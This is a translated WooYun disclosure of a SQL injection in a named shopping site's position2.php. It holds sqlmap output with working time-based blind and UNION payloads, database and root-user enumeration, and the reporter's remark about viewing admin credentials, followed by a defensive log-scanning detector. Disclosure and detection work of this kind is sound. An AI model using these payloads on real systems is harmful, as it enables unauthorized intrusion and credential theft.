WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
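2015-07-13: Details reported to the vendor; awaiting vendor handling
2015-07-13: Vendor confirmed; details disclosed to the vendor only
2015-07-23: Details disclosed to core white hats and experts in the relevant field
2015-08-02: Details disclosed to regular white hats
2015-08-12: Details disclosed to intern white hats
2015-08-27: Details disclosed to the public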
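Heaven and earth are not benevolent; they treat all things as straw dogs. [HD] In the name of the team, for the honor of the individual, building network security together.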
Injection point: http://www.517lppz.com/position2.php?id=-1 (the id parameter is injectable)
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 103 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.517lppz.com:80/position2.php?id=-1 OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))ZJFR)-- XMBf21=6 AND 000649=000649 --

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: http://www.517lppz.com:80/position2.php?id=-1 OR 3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x4f7842586e75516d774d,0x71626b7071),NULL,NULL,NULL,NULL,NULL,NULL-- 21=6 AND 000649=000649 --
---
[15:34:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0.12
[15:34:32] [INFO] fetching database names
available databases [4]:
[*] bestore
[*] information_schema
[*] mysql
[*] test
[15:34:32] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.517lppz.com'
[*] shutting down at 15:34:32
Checked the privileges:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.517lppz.com:80/position2.php?id=-1 OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))ZJFR)-- XMBf21=6 AND 000649=000649 --

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: http://www.517lppz.com:80/position2.php?id=-1 OR 3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x4f7842586e75516d774d,0x71626b7071),NULL,NULL,NULL,NULL,NULL,NULL-- 21=6 AND 000649=000649 --
---
[15:46:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0.12
[15:46:26] [INFO] fetching current user
current user: 'root@localhost'
[15:46:27] [INFO] fetching current database
current database: 'bestore'
[15:46:27] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.517lppz.com'
[*] shutting down at 15:46:27
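While I was at it, I looked at the data (found the administrator's account and password, but unfortunately did not find the login address).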
Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-07-13 17:58
The vulnerability is confirmed. Thank you for your attention!
None yet
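
The two techniques in the sqlmap output above (time-based blind and UNION query against the `id` parameter of `position2.php`) leave recognizable traces in web server access logs. The following detection sketch is an added example, not part of the original report or of sqlmap; the combined log format, the rule that valid ids are plain integers, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request target inside a combined-log-format line: "GET /path?query HTTP/1.1"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Signatures for the two techniques named in the sqlmap output.
SIGNATURES = {
    "time-based blind": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "union query": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}

def classify(value):
    """Return the reasons an `id` value is suspicious (empty list if clean)."""
    if re.fullmatch(r"\d+", value):  # assumption: valid ids are plain integers
        return []
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return hits or ["unexpected id format"]

def scan(lines, path="/position2.php", param="id"):
    """Yield (client_ip, reasons) for flagged requests to `path`."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != path:
            continue
        # parse_qsl percent-decodes values, so encoded payloads match too
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and (reasons := classify(value)):
                yield line.split()[0], reasons

# Constructed sample lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jul/2015:15:30:01 +0800] "GET /position2.php?id=12 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [13/Jul/2015:15:34:30 +0800] "GET /position2.php?id=-1%20OR%203%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)--%20 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [13/Jul/2015:15:34:31 +0800] "GET /position2.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL--%20 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [13/Jul/2015:15:34:32 +0800] "GET /position2.php?id=-1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, reasons)
```

Signature matching of this kind is a detection aid only. The underlying fix is a parameterized query with an integer-validated `id`, and an application database account that is not `root@localhost`.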